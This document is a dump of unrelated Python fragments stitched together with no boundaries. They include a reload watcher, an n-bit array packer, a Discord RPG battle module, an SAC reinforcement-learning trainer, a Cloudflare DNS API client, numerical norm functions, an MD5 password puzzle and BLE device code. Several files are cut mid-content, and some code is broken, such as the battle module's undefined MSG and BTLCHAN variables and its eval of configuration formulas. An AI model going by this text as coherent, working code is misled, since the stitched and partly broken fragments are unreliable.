LOGGER.debug("Files removed, triggering restart.") self._mtime_cache = new_mtimes callback() return def _is_changed_file(self, path, new_mtimes): # type: (str, Dict[str, int]) -> bool last_mtime = self._mtime_cache.get(path) if last_mtime is None: LOGGER.debug("File added: %s, triggering restart.", path) return True try: new_mtime = self._osutils.mtime(path) if new_mtime > last_mtime: LOGGER.debug("File updated: %s, triggering restart.", path) return True new_mtimes[path] = new_mtime return False except (OSError, IOError): return False def _recursive_walk_files(self, root_dir): # type: (str) -> Iterator[str] for rootdir, _, filenames in self._osutils.walk(root_dir): for filename in filenames: path = self._osutils.joinpath(rootdir, filename) yield path class nBitArray() : m = 32 f = 'I' _default_type = None def __init__(self, n_bit) : if not (isinstance(n_bit, int) and n_bit > 0) : raise ValueError self.n_bit = n_bit self.n_item = 0 self.b_mask = (2 ** self.n_bit) - 1 self.i_mask = ((0x1 << self.m) - 1) def _normalize_index(self, index) : if (-1 * self.n_item) <= index < 0 : index += self.n_item if 0 <= index < self.n_item : return index raise IndexError def __getitem__(self, index): if isinstance(index, int) : return self._get_at(self._normalize_index(index)) elif isinstance(index, slice) : return (self._get_at(i) for i in range(* index.indices(self.n_item))) else: raise TypeError("index must be int or slice") def __str__(self) : u = io.StringIO() for n, i in enumerate(self._data) : u.write("{0:08X}".format(i)) u.write('\n' if (n + 1) % 6 == 0 else ' ') return u.getvalue() def load_data(self, value_lst) : """ load a list of n_bit words """ w_curs = 0 # position in the word word = 0 stack = list() for n, value in enumerate(value_lst) : value = value & self.b_mask v_curs = 0 # position in the value v_count = self.n_bit - v_curs # number of remaining bits to be written w_count = self.m - w_curs # number of bits available in the word while v_count > 0 : if w_count <= v_count : p = value >> (v_count - w_count) word |= p & self.i_mask v_curs += w_count w_curs += w_count else : p = value << (w_count - v_count) word |= p & self.i_mask v_curs += v_count w_curs += v_count if w_curs == self.m : stack.append(word) word = 0 w_curs = 0 v_count = self.n_bit - v_curs w_count = self.m - w_curs if word : stack.append(word) self.n_item = len(value_lst) self._data = array.array(self.f, stack) return self def _get_at(self, v_index) : if not 0 <= v_index < self.n_item : raise IndexError b = v_index * self.n_bit i_index = b // self.m # index of the word #print(v_index, b, i_index) v_curs = 0 # position in the value w_curs = b % self.m # position in the word v_count = self.n_bit - v_curs # number of remaining bits to append to the value w_count = self.m - w_curs # number of remaining bits to be read from the word value = 0 while v_count > 0 : #print("v curs={0}, count={1} - w curs={2}, count={3}".format(v_curs, v_count, w_curs, w_count)) if w_count <= v_count : value = (value << self.m) | self._data[i_index] #print("IF -> value = {0:05X}".format(value & self.b_mask)) v_curs += w_count w_curs += w_count else : value = (value << v_count) | (self._data[i_index] >> (w_count - v_count)) #print("ELSE -> value = {0:05X}".format(value & self.b_mask)) v_curs += v_count w_curs += v_count if w_curs == self.m : i_index += 1 w_curs = 0 v_count = self.n_bit - v_curs w_count = self.m - w_curs return value & self.b_mask if __name__ == '__main__' : high_res_sinus = [int(math.sin(i) * 0x3FFFFF) & 0x3FFFFF for i in range(10000)] 
low_res_sinus = [int(math.sin(i) * 0x3) & 0x3FFFFF for i in range(10000)] def do(array, name, size) : data = nBitArray(size).load_data(array)._data.tobytes() compressed = gzip.compress(data) print("{3}:{4} bits: {0} -> {1} ({2:0.1f} %)".format( len(data), len(compressed), 100 * len(compressed) / len(data), name, size) ) do(high_res_sinus, "high_res_sinus", 22) do(high_res_sinus, "high_res_sinus", 24) do(low_res_sinus, "low_res_sinus", 22) do(low_res_sinus, "low_res_sinus", 24) #WAP to accept a string from user and replace all occurrances of first character except for the first character. name = input("Please enter a string: ") replaceToken = input("Please enter token to replace: ") print (name) name2 = name[0] + name[1:].replace(name[0], replaceToken) print (name2)core/battle.py #!/usr/local/bin/python3 import time import json import yaml import asyncio from discord import Embed from core.common import make_embed, dictsub, SERVSET import core.party as party with open('conf/battletext.yaml', 'r') as yamlf: TEXT = yaml.load(yamlf) with open('conf/formulas.yaml', 'r') as yamlf: FORMULAS = yaml.load(yamlf)['battle'] def get_hpbar(MEM): BARSIZE = 20 PERDEC = round(MEM['stats']['hp'] / MEM['stats']['maxhp'], 2) CURPER = int(PERDEC * 100) NOTCHES = int(PERDEC * BARSIZE) BAR = '[' for hp in range(BARSIZE): if hp <= NOTCHES: BAR = BAR + '|' else: BAR = BAR + '-' BAR = BAR + '] ' + str(CURPER) + '%' return BAR def gen_cooldown(SECS): for sec in range(SECS, 1, -1): yield sec class battle(object): def __init__(self, PARTY, MONSTERS): self.STATUS = True self.ENDSTATE = '' self.PARTY = PARTY self.MONSTERS = MONSTERS def monster_party(self): SUBS = {} TEMP = TEXT['enemy_party'].copy() FIELDS = TEMP.pop('fields') TEMP['fields'] = [] for monster in self.MONSTERS.keys(): MON = self.MONSTERS[monster].copy() MON['hpbar'] = get_hpbar(MON) TEMP['fields'].append(dictsub(FIELDS[0], MON)) EMBD = dictsub(TEMP, SUBS) return make_embed(EMBD) def player_party(self): SUBS = {} TEMP = TEXT['player_party'].copy() FIELDS = TEMP.pop('fields') TEMP['fields'] = [] for player in self.PARTY.keys(): MEM = self.PARTY[player].copy() MEM['hpbar'] = get_hpbar(MEM) TEMP['fields'].append(dictsub(FIELDS[0], MEM)) EMBD = dictsub(TEMP, SUBS) return make_embed(EMBD) def cmdparse(self, CMD): ACTION = CMD.lower().split(' ') PLAYER = self.PARTY[MSG.author.id] if ACTION[0] in PLAYER['skills'].keys(): SKLD = PLAYER['skills'][ACTION[0]] if len(ACTION) < 2: TARGET = 1 else: TARGET = ACTION[1] self.do_action(SKLD, PLAYER, TARGET) def do_action(self, SKLD, PLAYER, TARGET): SUBS = SKLD.copy() SUBS['mod'] = PLAYER['stats'][SKLD['mod']] if SKLD['target'] == 'enemy': if TARGET not in self.MONSTERS: TARGET = 1 for t in SKLD['type']: FTEMP = FORMULAS[t] FORMRES = eval(dictsub(FTEMP, SUBS)) if t == 'damage': self.MONSTERS[TARGET]['stats']['hp'] -= FORMRES async def msgparse(MSG): try: if MSG.content == '//form': await party.form_party(MSG.channel, MSG.author) BTL.cmdparse(MSG.content[2:]) except NameError: pass async def form_party(BTLLOB, PLAYER): PARTY = party.gather_party(PLAYER.id) GPMSG = await BTLLOB.send(embed=PARTY.display_status()) def check(msg): return msg.channel == BTLLOB and msg.content.startswith('//join') MSG = await CLIENT.wait_for('message', check=check) for cntdwn in range(10, 0, -1): SUBS = { 'cntdwn': cntdwn } EMBD = dictsub(BASECNT, SUBS) await GPMSG.edit(embed=make_embed(EMBD)) await asyncio.sleep(1) PARTY = await CLIENT.get_reaction_users(RES[0]) await MSG.delete() return PARTY async def setup(CLIENT, GUILD, CATEGORY): global BTL 
for chan in CATEGORY.channels: if chan.name == 'battles_lobby': BTLLOB = chan await BTLLOB.purge() await BTLLOB.send(embed=make_embed(TEXT['battle_lobby_top'])) while True: JOINED = await gather_party(CLIENT, BTLCHAN) PARTY = creators.setup_player_party(JOINED) MONSTERS = creators.generate_monster(1) BTL = battle(PARTY, MONSTERS) MPMSG = await BTLCHAN.send(embed=BTL.monster_party()) PPMSG = await BTLCHAN.send(embed=BTL.player_party()) COUNT = 0 while BTL.STATUS == True: await MPMSG.edit(embed=BTL.monster_party()) await PPMSG.edit(embed=BTL.player_party()) await asyncio.sleep(1) COUNT += 1 0 import sys import os import argparse import datetime import gym import numpy as np import itertools import torch from sac import SAC # from torch.utils.tensorboard import SummaryWriter from replay_memory import ReplayMemory from utils import hard_update import pybullet_env_mods def main(): parser = argparse.ArgumentParser(description='PyTorch Soft Actor-Critic Args') parser.add_argument('--env-name', default="HighFreqReacherBulletEnv-v0", help='Mujoco Gym environment (default: HalfCheetah-v2)') parser.add_argument('--policy', default="Gaussian", help='Policy Type: Gaussian | Deterministic (default: Gaussian)') parser.add_argument('--eval', type=bool, default=False, help='Evaluates a policy a policy every 10 episode (default: True)') parser.add_argument('--gamma', type=float, default=0.99, metavar='G', help='discount factor for reward (default: 0.99)') parser.add_argument('--tau', type=float, default=0.005, metavar='G', help='target smoothing coefficient(τ) (default: 0.005)') parser.add_argument('--lr', type=float, default=0.0003, metavar='G', help='learning rate (default: 0.0003)') parser.add_argument('--alpha', type=float, default=0.2, metavar='G', help='Temperature parameter α determines the relative importance of the entropy\ term against the reward (default: 0.2)') parser.add_argument('--automatic_entropy_tuning', type=bool, default=True, metavar='G', help='Automaically adjust α (default: False)') parser.add_argument('--seed', type=int, default=123456, metavar='N', help='random seed (default: 123456)') parser.add_argument('--batch_size', type=int, default=256, metavar='N', help='batch size (default: 256)') parser.add_argument('--num_steps', type=int, default=125000, metavar='N', help='maximum number of steps (default: 1000000)') parser.add_argument('--hidden_size', type=int, default=256, metavar='N', help='hidden size (default: 256)') parser.add_argument('--updates_per_step', type=int, default=1, metavar='N', help='model updates per simulator step (default: 1)') parser.add_argument('--start_steps', type=int, default=10000, metavar='N', help='Steps sampling random actions (default: 10000)') parser.add_argument('--target_update_interval', type=int, default=1, metavar='N', help='Value target update per no. 
of updates per step (default: 1)') parser.add_argument('--replay_size', type=int, default=1000000, metavar='N', help='size of replay buffer (default: 10000000)') parser.add_argument('--cuda', action="store_true", help='run on CUDA (default: False)') parser.add_argument('--act_dt', required=False, type=float, default='0.016') parser.add_argument('--update_period', required=False, type=float, default='1.0') parser.add_argument('--g_exp', required=False, type=float, default='1.0') parser.add_argument('--sim_dt', required=False, type=float, default='0.002') args = parser.parse_args() # sim_dt = 0.002 # dt-aware # args.gamma = args.gamma ** (args.act_dt / 0.016) args.gamma = args.gamma ** (args.g_exp) args.replay_size = int(args.replay_size * (0.016 / args.act_dt)) env_dir_id = 'invdblpndlm4' if args.env_name == 'HighFreqInvertedDoublePendulumBulletEnv-v0' else 'reacher' weights_dir = 'sac_runs/dt_weights_' + env_dir_id + '/' + str(args.seed) returns_dir = 'sac_runs/dt_returns_' + env_dir_id + '/' + str(args.seed) # run_id = str(args.act_dt) + '_' + str(args.batch_size) + '_' + str(args.update_period) + '_' + str(args.sim_dt) run_id = '{}_{}_{}_{}_{}_{}_{}_{}'.format(args.act_dt, args.batch_size, args.update_period, args.g_exp, args.replay_size, args.tau, args.target_update_interval, args.sim_dt) weights_path_actor = weights_dir + '/' + run_id + '_actor.pth' weights_path_critic = weights_dir + '/' + run_id + '_critic.pth' returns_path = returns_dir + '/' + run_id + '.csv' if os.path.exists(returns_path): print('This run has happened before. Returns are available at: ' + returns_path) sys.exit() for dirname in [weights_dir, returns_dir]: if not os.path.exists(dirname): os.makedirs(dirname, exist_ok=True) args.num_steps = args.num_steps * int(0.016 // args.sim_dt) args.start_steps = args.start_steps * int(0.016 // args.sim_dt) # Environment # env = NormalizedActions(gym.make(args.env_name)) env = gym.make(args.env_name) env.seed(args.seed) env.action_space.seed(args.seed) # NOTE there should be a better way to do this env.robot.clip_scale = 1.0 torch.manual_seed(args.seed) np.random.seed(args.seed) # Agent updated_agent = SAC(env.observation_space.shape[0], env.action_space, args) agent = SAC(env.observation_space.shape[0], env.action_space, args) hard_update(agent.policy, updated_agent.policy) #Tesnorboard # writer = SummaryWriter('runs/{}_SAC_{}_{}_{}'.format(datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S"), args.env_name, # args.policy, "autotune" if args.automatic_entropy_tuning else "")) # Memory memory = ReplayMemory(args.replay_size, args.seed) # Training Loop total_numsteps = 0 updates = 0 total_agent_steps = 0 ac_interval = args.act_dt // args.sim_dt for i_episode in itertools.count(1): r_buffer = 0 agent_steps = 0 episode_reward = 0 episode_steps = 0 done = False state = env.reset() while not done: if episode_steps % ac_interval == 0: if len(memory) > args.batch_size: if True: #(args.update_period <= 1) or ((args.update_period > 1) and (total_agent_steps % args.update_period == 0)): hard_update(agent.policy, updated_agent.policy) if args.start_steps > total_numsteps: action = env.action_space.sample() # Sample random action else: action = agent.select_action(state) # Sample action from policy act_state = state if len(memory) > args.batch_size: if (args.update_period <= 1) or ((args.update_period > 1) and (total_agent_steps % args.update_period == 0)): epochs = 1 if args.update_period <= 1: epochs = int(1.0 / args.update_period) # Number of updates per step in environment for i in 
range(epochs): # Update parameters of all the networks critic_1_loss, critic_2_loss, policy_loss, ent_loss, alpha = updated_agent.update_parameters(memory, args.batch_size, updates) # writer.add_scalar('loss/critic_1', critic_1_loss, updates) # writer.add_scalar('loss/critic_2', critic_2_loss, updates) # writer.add_scalar('loss/policy', policy_loss, updates) # writer.add_scalar('loss/entropy_loss', ent_loss, updates) # writer.add_scalar('entropy_temprature/alpha', alpha, updates) updates += 1 next_state, reward, done, _ = env.step(action) # Step r_buffer += reward next_state_ = next_state if (episode_steps + 1) % ac_interval == 0 or done: # Ignore the "done" signal if it comes from hitting the time horizon. # (https://github.com/openai/spinningup/blob/master/spinup/algos/sac/sac.py) mask = 1 if episode_steps + 1 == env._max_episode_steps else float(not done) memory.push(act_state, action, r_buffer, next_state_, mask) # Append transition to memory r_buffer = 0 agent_steps += 1 total_agent_steps += 1 episode_steps += 1 total_numsteps += 1 episode_reward += reward state = next_state # writer.add_scalar('reward/train', episode_reward, i_episode) print("Episode: {}, total numsteps: {}, agent steps: {}, reward: {}".format(i_episode, total_numsteps, agent_steps, round(episode_reward, 2))) updated_agent.save_model(env_name='highfreqreacher', actor_path=weights_path_actor, critic_path=weights_path_critic) save_returns(total_numsteps, episode_reward, agent_steps, returns_path) if total_numsteps > args.num_steps: break if i_episode % 10 == 0 and args.eval is True: avg_reward = 0. episodes = 10 for _ in range(episodes): state = env.reset() episode_reward = 0 done = False while not done: action = agent.select_action(state, evaluate=True) next_state, reward, done, _ = env.step(action) episode_reward += reward state = next_state avg_reward += episode_reward avg_reward /= episodes # writer.add_scalar('avg_reward/test', avg_reward, i_episode) print("----------------------------------------") print("Test Episodes: {}, Avg. 
Reward: {}".format(episodes, round(avg_reward, 2))) print("----------------------------------------") env.close() def save_returns(steps, ret, agent_steps, path): with open(path, 'a', encoding='utf-8') as returns_file: returns_file.write('{},{},{}\n'.format(steps, ret, agent_steps)) if __name__ == "__main__": main() 1-10 from ._titlefont import Titlefont from ._tickformatstop import Tickformatstop from ._tickfont import Tickfont from ._rangeslider import Rangeslider from plotly.graph_objs.layout.xaxis import rangeslider from ._rangeselector import Rangeselector from plotly.graph_objs.layout.xaxis import rangeselector import torch from torch.nn import CrossEntropyLoss from transformers import AutoModel, AutoConfig COLUMN_SQL_LABEL_COUNT = 563 SQL_DIFF_LABEL_COUNT = 120 class BartForContext(torch.nn.Module): config_class = AutoConfig base_model_prefix = "bart" def __init__(self, config): super(BartForContext, self).__init__() self.bart = AutoModel.from_pretrained(config) self.config = AutoConfig.from_pretrained(config) self.linear = torch.nn.Linear(self.config.hidden_size, SQL_DIFF_LABEL_COUNT) def forward( self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, masked_lm_labels=None, masked_col_labels=None, masked_context_labels=None, q_tab_inds=None, is_train=True ): outputs = self.bart(input_ids=input_ids, attention_mask=attention_mask, decoder_input_ids=masked_context_labels) # [batch_size, output_length, hidden_size] context_prediction_scores = outputs[0] # [batch_size, output_length, sql_diff_label_count] context_prediction_scores = self.linear(context_prediction_scores) total_loss = None if masked_context_labels is not None: context_loss_fct = CrossEntropyLoss(ignore_index=-1) masked_context_loss = context_loss_fct( context_prediction_scores.view(-1, SQL_DIFF_LABEL_COUNT), masked_context_labels.view(-1)) if total_loss is None: total_loss = masked_context_loss else: total_loss += masked_context_loss if is_train: return total_loss else: return total_loss, context_prediction_scores import pyinotify as pyinotify from nekumo.api.base import NekumoNodeEvent, API from nekumo.utils.filesystem import path_split_unix class EventHandler(pyinotify.ProcessEvent): def __init__(self, nekumo, directory): super().__init__() self.nekumo = nekumo self.directory = directory def process_default(self, event): path = event.pathname.replace(self.directory, '') directory = path_split_unix(path)[0] action = event.maskname.replace('IN_', '').lower() # node = API(self.nekumo, path, 'info').get_instance().execute() self.nekumo.pubsub.fire(directory, NekumoNodeEvent(self.nekumo, path, action)) def init_watcher(nekumo, directory): # The watch manager stores the watches and provides operations on watches wm = pyinotify.WatchManager() notifier = pyinotify.ThreadedNotifier(wm, EventHandler(nekumo, directory)) notifier.daemon = True notifier.start() mask = pyinotify.IN_DELETE | pyinotify.IN_CREATE # watched events wdd = wm.add_watch(directory, mask, rec=True) dns_cf.py import json import requests from dns_record import DnsRecord import logging """ https://api.cloudflare.com/#dns-records-for-a-zone-list-dns-records """ session = requests.Session() session.headers.update({ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ' 'Chrome/74.0.3729.169 Safari/537.36 ', 'Content-Type': 'application/json' }) class DNSApi: def __init__(self): self.configs = { 'CF_Account_ID': None, 'CF_Zone_ID': None, 'CF_Api_Token': None, 'CF_Api_Key': None, 
} def get_headers(self): if self.configs['CF_Zone_ID'] is None: raise Exception('CF_Zone_ID cannot be none') if self.configs['CF_Api_Token']: return { 'Authorization': 'Bearer %s' % self.configs['CF_Api_Token'] } elif self.configs['CF_Api_Key'] and self.configs['CF_Account_ID']: return { 'X-Auth-Email': self.configs['CF_Account_ID'], 'X-Auth-Key': self.configs['CF_Api_Key'] } else: raise Exception('CF_Api_Key cannot be none or (X-Auth-Email and X-Auth-Key cannot be none)') def list(self, hostnames): logging.info('get dns record list...') api_url = "https://api.cloudflare.com/client/v4/zones/%s/dns_records" % self.configs["CF_Zone_ID"] r = requests.get(url=api_url, data="type=A&page=1&per_page=100&match=any", headers=self.get_headers()) if r.status_code != 200: logging.info('get dns record list failed') raise Exception('request error:%s(%s)' % (r.text, r.status_code)) r = r.json() records = [] if r['success']: for record in r['result']: if record['name'] in hostnames: records.append( DnsRecord(id=record['id'], type=record['type'], name=record['name'], content=record['content'], ttl=record['ttl'])) logging.info('get dns record list success, length = %s' % len(records)) return records else: logging.info('get dns record list failed') raise Exception('request error: %s' % r) def edit(self, record): logging.info('edit dns record: %s' % json.dumps(record.__dict__)) api_url = "https://api.cloudflare.com/client/v4/zones/%s/dns_records/%s" % ( self.configs["CF_Zone_ID"], record.id) data = { 'content': record.content } r = requests.patch(url=api_url, data=json.dumps(data), headers=self.get_headers()) if r.status_code != 200: logging.info('edit dns record failed') raise Exception('request error:%s(%s)' % (r.text, r.status_code)) r = r.json() if not r['success']: logging.info('edit dns record failed') raise Exception('request error: %s' % r) logging.info('edit dns record success') # chat/routing.py from django.urls import re_path from kafka_example.channels import consumers websocket_urlpatterns = [ re_path(r'example/ws/$', consumers.ExampleConsumer.as_asgi()), ] 0 import numpy as np import math def euclidiana(vetor): # norma-2 vetorial n, x = len(vetor), 0 for i in range(n): x += math.fabs(vetor[i]) ** 2 return x ** (1/2) def manhattan(vetor): # norma-1 vetorial n, x = len(vetor), 0 for i in range(n): x += math.fabs(vetor[i]) return x def p(vetor, p): #norma-p vetorial n, x = len(vetor), 0 for i in range(n): x += math.fabs(math.pow(vetor[i], p)) return x ** (1/p) def infinita(vetor): # norma-infinita vetorial n, max = len(vetor), vetor[0] for i in range(1, n): if math.fabs(vetor[i]) > max: max = math.fabs(vetor[i]) return max def frobenius(matriz_a): # norma-2 matricial n, x = len(matriz_a), 0 for i in range(n): for j in range(n): x += math.pow(math.fabs(matriz_a[i,j]), 2) return x ** (1/2) def soma_coluna(matriz_a): # norma-1 matricial n, max, x = len(matriz_a), 0, 0 for j in range(n): for i in range(n): x += math.fabs(matriz_a[i,j]) if x > max: max = x return max def soma_linha(matriz_a): # norma-infinita matricial n, max, x = len(matriz_a), 0, 0 for i in range(n): for j in range(n): x += math.fabs(matriz_a[i,j]) if x > max: max = x return max def residual(matriz_a, vetor_b, delta_x): #norma-residual matricial n, k = len(matriz_a), np.linalg.cond(matriz_a) delta_b = np.matmul(matriz_a, delta_x) vetor_r = vetor_b - delta_b vetor_x = np.ones(n) vetor_x_menos_delta_x = vetor_x - delta_x residuo_r_b = euclidiana(vetor_r)/euclidiana(vetor_b) print("Vetor residual:\n", vetor_r) print("Resíduo da solução 
x:", residuo_r_b) if euclidiana(vetor_x_menos_delta_x)/euclidiana(vetor_x) <= k*residuo_r_b: print("A solução encontrada é precisa.") else: print("A solução encontrada não é precisa.")import md5 input = "ugkcyxxp" def part1(): x = 0 pwd = "" print '{:_<8}'.format(pwd) while True: m = md5.new() m.update(input) m.update(str(x)) digest = m.hexdigest() if digest.startswith("00000"): pwd += digest[5:6] print '{:_<8}'.format(pwd) x += 1 if len(pwd) == 8: break return pwd def part2(): x = 0 pwd = list("_" * 8) print "".join(pwd) while True: m = md5.new() m.update(input) m.update(str(x)) digest = m.hexdigest() if digest.startswith("00000"): loc = ord(digest[5:6]) if 48 <= loc <= 55 and pwd[int(chr(loc))] == "_": pwd[int(chr(loc))] = digest[6:7] print "".join(pwd) x += 1 if "_" not in pwd: break return "".join(pwd) print "Part1: " + str(part1()) print "Part2: " + str(part2()) src/py/model/Document.py from google.appengine.ext import ndb class UserDoc(ndb.Model): user_id = ndb.StringProperty() doc_key = ndb.BlobKeyProperty() doc_lang = ndb.StringProperty() doc_ocr = ndb.TextProperty() def get_by_user(self, user_id): return UserDoc.gql("WHERE user_id = :1", user_id)NeonOcean/Environment from interactions.utils.routing import fgl_and_get_two_person_transforms_for_jig from sims4.tuning.tunable import AutoFactoryInit, HasTunableSingletonFactory, TunableReference import placement import services class SocialJigFromDefinition(AutoFactoryInit, HasTunableSingletonFactory): FACTORY_TUNABLES = {'jig_definition': TunableReference(description='\n The jig to use for finding a place to do the social.\n ', manager=services.definition_manager())} def get_transforms_gen(self, actor, target, actor_slot_index=0, target_slot_index=1, stay_outside=False, fallback_routing_surface=None, **kwargs): (actor_transform, target_transform, routing_surface) = fgl_and_get_two_person_transforms_for_jig(self.jig_definition, actor, actor_slot_index, target, target_slot_index, stay_outside, fallback_routing_surface=fallback_routing_surface, **kwargs) yield (actor_transform, target_transform, routing_surface, ()) def get_footprint_polygon(self, sim_a, sim_b, sim_a_transform, sim_b_transform, routing_surface): return placement.get_placement_footprint_compound_polygon(sim_b_transform.translation, sim_b_transform.orientation, routing_surface, self.jig_definition.get_footprint(0)) # 5! = 120: # # 5 * 4 * 3 * 2 * 1 def factorial(n): if n == 1: return 1 return n * factorial(n - 1) print("5!={:,}, 3!={:,}, 11!={:,}".format( factorial(5), # 120 factorial(3), # 6 factorial(11) # HUGE )) # Fibonacci numbers: # 1, 1, 2, 3, 5, 8, 13, 21, ... def fibonacci(limit): nums = [] current = 0 next = 1 while current < limit: current, next = next, next + current nums.append(current) return nums print('via lists') for n in fibonacci(100): print(n, end=', ') print() def fibonacci_co(): current = 0 next = 1 while True: current, next = next, next + current yield current print('with yield') for n in fibonacci_co(): if n > 1000: break print(n, end=', ') mami-project/lurk # pylint: disable = line-too-long, multiple-statements, missing-module-attribute, print-statement """https://bitbucket.org/logilab/pylint/issue/111/false-positive-used-before-assignment-with""" try: raise IOError(1, "a") except IOError as err: print(err) 1-10 from . 
import profile_get_renamed_variables if __name__ == '__main__': profile_get_renamed_variables() # Generated by Django 4.0.4 on 2022-05-18 10:40 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('gasolinapp', '0001_initial'), ] operations = [ migrations.AlterField( model_name='gasolinera', name='location', field=models.CharField(max_length=100), ), migrations.AlterField( model_name='gasolinera', name='schedule', field=models.CharField(max_length=100), ), ] def FindDifference(word): letters = list("programmer") i = 0 j = 0 while i < len(word) and j < len(letters): if word[i] == letters[j]: j+=1 i+=1 start = i - 1 if i == len(word): return -1 i = len(word) j = len(letters) while i > 0 and j > 0: i -= 1 if word[i] == letters[j - 1]: j-=1 end = i return end - start - 1 if __name__ == '__main__': print(FindDifference("progxrammerrxproxgrammer"))import codecademylib from matplotlib import pyplot as plt unit_topics = ['Limits', 'Derivatives', 'Integrals', 'Diff Eq', 'Applications'] num_hardest_reported = [1, 3, 10, 15, 1] #Make your plot here plt.figure(figsize=(10,8)) plt.pie(num_hardest_reported, labels=unit_topics, autopct="%1d%%") plt.axis('equal') plt.title('Hardest Topics') plt.show() plt.savefig("my_pie_chart.png") # -*- coding: utf-8 -*- """ Package containing the implementation of the tools of the Multidimensional Supplemental Tools. This package contains both the high level implementation of the tools as well as the lower level code implementing the tools. """ from keyword import * from keywords import * from math import * from . import netcdf from constants import * from ordered_set import * import functools import logging import time from pygatt import BLEDevice, exceptions from . import constants from .bgapi import BGAPIError from .error_codes import ErrorCode from .packets import BGAPICommandPacketBuilder as CommandBuilder from .bglib import EventPacketType, ResponsePacketType log = logging.getLogger(__name__) def connection_required(func): """Raise an exception if the device is not connected before calling the actual function. """ @functools.wraps(func) def wrapper(self, *args, **kwargs): if self._handle is None: raise exceptions.NotConnectedError() return func(self, *args, **kwargs) return wrapper class BGAPIBLEDevice(BLEDevice): def __init__(self, address, handle, backend): super(BGAPIBLEDevice, self).__init__(address) self._handle = handle self._backend = backend @connection_required def bond(self, permanent=False): """ Create a bond and encrypted connection with the device. """ # Set to bondable mode so bonds are store permanently if permanent: self._backend.set_bondable(True) log.debug("Bonding to %s", self._address) self._backend.send_command( CommandBuilder.sm_encrypt_start( self._handle, constants.bonding['create_bonding'])) self._backend.expect(ResponsePacketType.sm_encrypt_start) packet_type, response = self._backend.expect_any( [EventPacketType.connection_status, EventPacketType.sm_bonding_fail]) if packet_type == EventPacketType.sm_bonding_fail: raise BGAPIError("Bonding failed") log.info("Bonded to %s", self._address) @connection_required def get_rssi(self): """ Get the receiver signal strength indicator (RSSI) value from the device. Returns the RSSI as in integer in dBm. """ # The BGAPI has some strange behavior where it will return 25 for # the RSSI value sometimes... Try a maximum of 3 times. 
for i in range(0, 3): self._backend.send_command( CommandBuilder.connection_get_rssi(self._handle)) _, response = self._backend.expect( ResponsePacketType.connection_get_rssi) rssi = response['rssi'] if rssi != 25: return rssi time.sleep(0.1) raise BGAPIError("get rssi failed") @connection_required def char_read(self, uuid, timeout=None): return self.char_read_handle(self.get_handle(uuid), timeout=timeout) @connection_required def char_read_handle(self, handle, timeout=None): log.info("Reading characteristic at handle %d", handle) self._backend.send_command( CommandBuilder.attclient_read_by_handle( self._handle, handle)) self._backend.expect(ResponsePacketType.attclient_read_by_handle) success = False while not success: matched_packet_type, response = self._backend.expect_any( [EventPacketType.attclient_attribute_value, EventPacketType.attclient_procedure_completed], timeout=timeout) # TODO why not just expect *only* the attribute value response, # then it would time out and raise an exception if allwe got was # the 'procedure completed' response? if matched_packet_type != EventPacketType.attclient_attribute_value: raise BGAPIError("Unable to read characteristic") if response['atthandle'] == handle: # Otherwise we received a response from a wrong handle (e.g. # from a notification) so we keep trying to wait for the # correct one success = True return bytearray(response['value']) @connection_required def char_read_long(self, uuid, timeout=None): return self.char_read_long_handle(self.get_handle(uuid), timeout=timeout) @connection_required def char_read_long_handle(self, handle, timeout=None): log.info("Reading long characteristic at handle %d", handle) self._backend.send_command( CommandBuilder.attclient_read_long( self._handle, handle)) self._backend.expect(ResponsePacketType.attclient_read_long) success = False response = b"" while not success: matched_packet_type, chunk = self._backend.expect_any( [EventPacketType.attclient_attribute_value, EventPacketType.attclient_procedure_completed], timeout=timeout) if (matched_packet_type == EventPacketType.attclient_attribute_value): if chunk['atthandle'] == handle: # Concatenate the data response += chunk["value"] elif (matched_packet_type == EventPacketType.attclient_procedure_completed): if chunk['chrhandle'] == handle: success = True return bytearray(response) @connection_required def char_write_handle(self, char_handle, value, wait_for_response=True): while True: value_list = [b for b in value] # An "attribute write" is always acknowledged by the remote host. if wait_for_response: self._backend.send_command( CommandBuilder.attclient_attribute_write( self._handle, char_handle, value_list)) self._backend.expect( ResponsePacketType.attclient_attribute_write) packet_type, response = self._backend.expect( EventPacketType.attclient_procedure_completed, # According to the BLE spec, the device has 30 seconds to # repsonse to the attribute write. timeout=30) # A "command" write is unacknowledged - don't wait for a response. 
else: self._backend.send_command( CommandBuilder.attclient_write_command( self._handle, char_handle, value_list)) packet_type, response = self._backend.expect( ResponsePacketType.attclient_write_command) if (response['result'] != ErrorCode.insufficient_authentication.value): # Continue to retry until we are bonded break # ASC - adapted from # https://raw.githubusercontent.com/mjbrown/bgapi/master/bgapi/module.py # - reliable_write_by_handle @connection_required def char_write_long_handle(self, char_handle, value, wait_for_response=False): maxv = 18 for i in range(int(((len(value)-1) / maxv)+1)): chunk = value[maxv*i:min(maxv*(i+1), len(value))] value_list = [b for b in chunk] self._backend.send_command( CommandBuilder.attclient_prepare_write( self._handle, char_handle, maxv*i, value_list)) packet_type, response = self._backend.expect( ResponsePacketType.attclient_prepare_write) packet_type, response = self._backend.expect( EventPacketType.attclient_procedure_completed) time.sleep(0.1) time.sleep(0.1) self._backend.send_command( CommandBuilder.attclient_execute_write( self._handle, 1)) # 1 = commit, 0 = cancel self._backend.expect(ResponsePacketType.attclient_execute_write) packet_type, response = self._backend.expect( EventPacketType.attclient_procedure_completed) time.sleep(0.1) @connection_required def disconnect(self): log.debug("Disconnecting from %s", self._address) self._backend.send_command( CommandBuilder.connection_disconnect(self._handle)) self._backend.expect(ResponsePacketType.connection_disconnect) log.info("Disconnected from %s", self._address) self._handle = None @connection_required def discover_characteristics(self): self._characteristics = self._backend.discover_characteristics( self._handle) return self._characteristics thomasgas/cta-lstchainlstchain/mc/tests/test_mc.py import numpy as np from lstchain.mc import ( power_law_integrated_distribution, int_diff_sp, rate, weight ) def test_integrated_distribution(): emin = 50. # u.GeV emax = 500.e3 # u.GeV nevents = 1e6 spectral_index = -2.5 bins = 30 b , y = power_law_integrated_distribution( emin, emax, nevents, spectral_index, bins) np.testing.assert_allclose(nevents,np.sum(y),rtol=1.e-10) def test_diff_sp(): emin = 30. # u.GeV emax = 100.e3 # u.GeV spectral_index = -2. e0 = 1000. # u.GeV integral_e = int_diff_sp(emin, emax, spectral_index, e0) np.testing.assert_allclose(integral_e, 33323, rtol=1e-3) 